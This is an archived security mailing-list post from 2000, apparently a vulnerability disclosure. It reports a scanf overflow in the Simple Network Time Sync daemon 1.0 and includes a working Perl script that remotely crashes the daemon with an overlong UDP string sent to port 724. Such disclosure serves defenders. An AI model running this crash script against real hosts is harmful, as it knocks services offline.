OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Subject: Vulnerability in SNTS
From: logistix (fragment001HOTMAIL.COM)
Date: Thu Jun 01 2000 - 01:50:52 CDT


I noticed an uncommon scanf overflow in the Simple Network
Time Sync daemon and client version 1.0, tested on Redhat
6.1. I haven't looked into this fully yet, but it looks as
tho it could be root comprimising as it sits on a
priveledged udp port and seems to coredump, but looks like
it only gives you 50 chars to run code with. I have
included some perl here which will crash it remotely by
sending it a string over 50 chars.

---------------------------------------

#!/usr/bin/perl -w
#
# Usage: ./kill_sntsd <hostname>
#

use Socket;

send_packet(); # Needs to send 2 packets to kill the client
and the server daemons
send_packet();

sub send_packet {

$proto = getprotobyname('udp');
$localaddr = gethostbyname("localhost") || die "error: $!
\n";
$iaddr = gethostbyname($ARGV[0]) || die "$!\n";
$sin = sockaddr_in(724, $iaddr);
$paddr = sockaddr_in(53, $localaddr);
socket(SH, PF_INET, SOCK_DGRAM, $proto);
bind(SH, $paddr);

$|=1;

connect(SH, $sin) || die "$!\n";

# A string longer than 50 characters...
print
SH "logistixlogistixlogistixlogistixlogistixlogistixlogistix
\n";
close(SH);

}

---------------------------------------

logistix